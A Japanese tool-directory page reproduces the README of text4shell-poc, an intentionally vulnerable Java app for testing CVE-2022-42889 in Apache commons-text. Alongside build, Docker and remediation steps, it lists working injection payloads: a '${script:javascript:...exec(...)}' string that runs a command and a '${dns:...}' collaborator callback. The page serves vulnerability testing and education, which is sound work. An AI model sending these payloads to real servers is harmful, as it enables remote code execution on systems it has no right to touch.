Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
text4shell-poc — CVE-2022-42889をテストするための概念実証アプリケーション | Kitploit
ツール/GitHubGitHub/securekomodo/text4shell-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ラボと実践
GitHubsecurekomodo/text4shell-poc

text4shell-poc

CVE-2022-42889をテストするための概念実証アプリケーション

リポジトリを見る
8113年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-42889 PoC テストアプリケーション

これは、脆弱性 CVE-2022-42889 の概念実証(PoC)として開発された脆弱なアプリケーションです。

Maven インストール

これを実行するには、以下が必要です:

  • JDK 17 以上
  • Maven
  1. git リポジトリをクローンします
root@kitploit:~
git clone https://github.com/securekomodo/text4shell-poc.git
cd text4shell-poc
  1. Maven でインストールして JAR を作成します
root@kitploit:~
mvn clean install

これにより ./target フォルダーが作成され、その中に JAR ファイル text4shell-poc-0.0.1-SNAPSHOT.jar が生成されます。

  1. Web サーバーを起動します
root@kitploit:~
java -jar ./target/text4shell-poc-0.0.1-SNAPSHOT.jar

これにより、デフォルトで localhost のポート 8080 で Web サーバーが起動します。

  1. Web サーバーにアクセスします

http://localhost:8080/ にアクセスすると、次の出力が表示されます

root@kitploit:~
Text4Shell POC Test -@securekomodo
Send payloads to /reflected?poc=yourpayload
OR Send payloads to /blind with payload as your userAgent
  1. 手動でエクスプロイトするか、text4shell-scan を使用してスキャンを実行します

サンプルエクスプロイトペイロード

root@kitploit:~
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/itworked')}
root@kitploit:~
${dns:<burp collaborator host>)}

エクスプロイトを確実に実演するための推奨 URL エンコーダー: https://www.urlencoder.org/。

Docker

または、Docker を使用してこの PoC を実行することもできます:

  1. git リポジトリをクローンします
root@kitploit:~
git clone https://github.com/securekomodo/text4shell-poc.git
cd text4shell-poc
  1. Docker ビルドを実行します
root@kitploit:~
docker build --tag=text4shell-poc .
  1. Docker を実行します
root@kitploit:~
docker run -p 80:8080 text4shell-poc
  1. 脆弱なアプリをテストします
root@kitploit:~
http://localhost/
  1. 攻撃は、以下のように “${prefix:name}” という文字列を渡すことで実行できます:
root@kitploit:~
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}
root@kitploit:~
${dns:<burp collaborator host>)}

エクスプロイトを確実に実演するための推奨 URL エンコーダー: https://www.urlencoder.org/。

あるいは、text4shell-scan などのスキャンツールの有効性を検証することもできます

あなたのコードは脆弱ですか?

あなたのコードが脆弱であるためには、以下の条件を満たす必要があります:

  • Apache commons-text のバージョン 1.5.0 以上、1.10.0 未満を実行していること
  • StringSubstituion に Interpolation を使用していること(https://commons.apache.org/proper/commons-text/apidocs/org/apache/commons/text/StringSubstitutor.html を参照) - これはあまり一般的ではないことに注意してください

修正方法

修正方法は、commons-text のインスタンスをバージョン 1.10.0 以降に更新することです。

作者

Bryan Smith

  • Twitter: https://twitter.com/securekomodo
ツールをダウンロード